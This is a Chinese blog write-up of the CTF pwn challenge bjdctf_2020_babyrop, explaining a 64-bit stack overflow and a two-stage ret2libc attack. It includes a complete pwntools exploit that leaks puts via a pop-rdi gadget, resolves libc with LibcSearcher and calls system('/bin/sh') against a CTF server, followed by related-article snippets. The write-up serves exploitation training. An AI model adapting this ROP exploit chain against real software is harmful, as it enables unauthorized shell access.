bjdctf_2020_babyrop

已于 2022-08-12 23:49:07 修改
阅读量904 收藏 2
点赞数
文章标签: pwn
于 2022-01-25 20:34:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014377094/article/details/122691185
版权

首先来个checksec,发现开了NX,是个64位程序

使用ida64打开程序,发现比我脸都干净

 点一下vuln,这味道熟悉了嗷,栈溢出。

按一下shift+f12,发现嘛也没有,但“can u return to libc?”很是显眼。上图还有个puts,想法稍微明确,这是让咱用puts找基址,间接去找system和bin/sh字符串。

 

 实现步骤分为两步:

第一步:找基址,这里需要LibcSearcher(这no matched是相当愁人,但不知道为何删了库反而好了,暂时不确定是咋回事)

准备工作如下

 找到puts的plt和got地址,以及pop-rdi-ret的地址和程序开始的地址,plt和got就直接用elf了

找pop-rdi-ret可以这样子在文件目录下找。

ROPgadget --binary bjdctf_2020_babyrop |grep "pop rdi"

接下来是真的找基址了

payload1=b"A"*(0x28)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start)
p.sendline(payload1)
puts=u64(p.recv(6).ljust(8,b'\x00'))
libc=LibcSearcher("puts",puts)
libcbase=puts-libc.dump("puts")
system=libcbase+libc.dump("system")
str_bin_sh=libcbase+libc.dump("str_bin_sh")

这里解释一下

b“A”(0x28)就不解释了。pop rdi放入返回地址,返回时执行,把puts的got表地址返回到rdi里,接下来ret到puts plt,puts-plt则是执行puts函数,rdi里是puts got的地址,而这个地址又指向puts的真实地址。也就是说,puts put了自己的真实地址。相当于投案自首了

payload1写好后发送,变量puts接收了真实地址。这里用了个ljust。puts地址前6个字节有效,所以最后得人为添加’\x00’补全8字节(这里其实我也没太明白6个字节有效)。

puts真实地址减去偏移地址得到基址,基址加system的偏移地址得到system的真实地址。

第二步:执行system

payload2=b"A"*(0x28)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(system)
p.recvuntil(b"story!\n")
p.sendline(payload2)
p.interactive()

一回生二回熟,这次知道pop rdi传参给system了。

打完收工,拿到flag

以下是完整代码

from pwn import *
from LibcSearcher import *
p=remote("node4.buuoj.cn",27835)
elf=ELF("./bjdctf_2020_babyrop")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
p.recvuntil(b"story!\n")
pop_rdi_ret=0x400733
start=0x400530
ret=0x400734
payload1=b"A"*(0x28)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start)
p.sendline(payload1)
puts=u64(p.recv(6).ljust(8,b'\x00'))
libc=LibcSearcher("puts",puts)
libcbase=puts-libc.dump("puts")
system=libcbase+libc.dump("system")
str_bin_sh=libcbase+libc.dump("str_bin_sh")
payload2=b"A"*(0x28)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(system)
p.recvuntil(b"story!\n")
p.sendline(payload2)
p.interactive()
Marx_ICB
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng 题目是一个zip包,尝试解压出错,用AZR压缩包修复工具修复后,解压得到一个secret文件,由于没有后缀名,放入010editor查看,发现含有IHDR 可能是缺少文件头,加上png的文件头89504E47后成功打开图片。发现424A44…等一列数字,猜测是十六进制,在线网站解密得到flag。附上网站:十六进制转文本 A_Bea
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]A_Beautiful_Picture 题目: 得到的 flag 建议用 flag{} 包上提交。 解题思路: 将图片放到kali中,发现报crc错误 直接上脚本爆破,脚本如下 import zlib import stru
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
亚信java笔试题 BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native container 环境下 build 和 run web Schrödinger - imagin tags: 查看源码 时间戳 修改cookie 打开网页,发现是个 login fucker,推测题目的意思是找一个能 fuck 的 login page,查看源码发现有一行白色的字体不显示,提示有 test.php,访问发现是个登录框。将 http://localhost/test.php 提交,发现网站貌似开始了爆破,但是爆破成功率却涨的很慢。查看 cookie 发现有个 base64 的 cookie 很可疑,decode 一下发现是提交时的时间戳。 将该 cookie 直接置空,刷新页面就发现成功率接近百分之百,check 一下得到爆破的结果. 通过 av 号在 b 站找到对应的视频,根据
BJDCTF 2nd–TARGZ
12-21
审题,tar没用,不需要爆破 下载附件得到tar.gz压缩包 查看16进制的时候发现是PK的头,对应的题目的提示tar不好使(就是不tar压缩的) 那么解压密码既然不用爆破,16头尾也没啥发现就试试用文件名去解压 发现可以解压但是得到的还是压缩包,继续重复操作… 当时我解了半小时(时间沉dedao默成本导致…)一直以为下一个就出了.. 累了去水水群吐槽,这是什么千层饼..很快得到出题人的回复 行吧上脚本 import zipfile import os import re #不知道为啥zip加了close还是提示正在操作,便无法边解压边删上个压缩包,有解决方法请师傅不吝赐教 def
Flex资料,关于Flex的基础资料
08-25
关于Flex的入门基础资料,详细介绍了Flex的开发,是一部难得的Flex教程
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 673
bjdctf_2020_babyrop
bjdctf_2020_babyrop【BUUCTF】
qq_41696518的博客
08-31 308
bjdctf_2020_babyrop
[BJDCTF 2020]babyrop
最新发布
沈理大学牲的博客
12-17 262
puts_add = u64(i.recv(6).ljust(8,b'\x00'))用来接收plt表中的puts的真实地址的。提醒一下,elf.ELF是()不是[]不难,按照以往的就可以。
BUU刷题(三)
playmaker的博客
03-13 898
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
justCTF-2020:justCTF 2020
05-24
justCTF-2020 justCTF 2020 和彩云分流: 链接: 提取码:GqUZ
bjdctf_2020_babyrop2-fmt-leak canary
个人笔记
04-10 381
这使得参数可以输出多次,使用多个格式说明符,以不同的顺序输出。本地libc下载:https://github.com/Yeuoly/buuctf_pwn/tree/master/bjdctf_2020_babyrop2。printf(“%p”, a) 用地址的格式打印变量 a 的值,printf(“%p”, &a) 打印变量 a 所在的地址。思路:aa相当于定位标识,format在格式化假参数6的位置,所以构造成。2,IDA静态分析,查看可以泄露canary的地方,否则只能爆破了。canary的位置:即。
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 397
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
buuctf pwn bjdctf_2020_babyrop
MrTreebook的博客
05-14 283
buuctf pwn bjdctf_2020_babyrop1.checksec2.IDA分析ropper3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我们接着看一下vuln函数 buf只有32,但是我们可以写64 很明显的溢出 本程序没开PIE 没开canary 再看一下有没有后门函数 没有"/bin/sh" 没有system()函数 那么就要通过泄露函数地址来计算libc的基地址了 64位程序在传参的时候需要用到寄存器 当参数少于7个时, 参数从左到
BUUCTF-bjdctf_2020_babyrop1-WP
Rt1Text的博客
10-17 219
只有NX保护。
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1458
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
BUU刷题-Pwn-bjdctf_2020_babyrop
一个啥也不会的小菜鸡!
06-21 61
[LibcSearcher的使用]]一个简单的栈溢出构造ROP链!
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。...在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值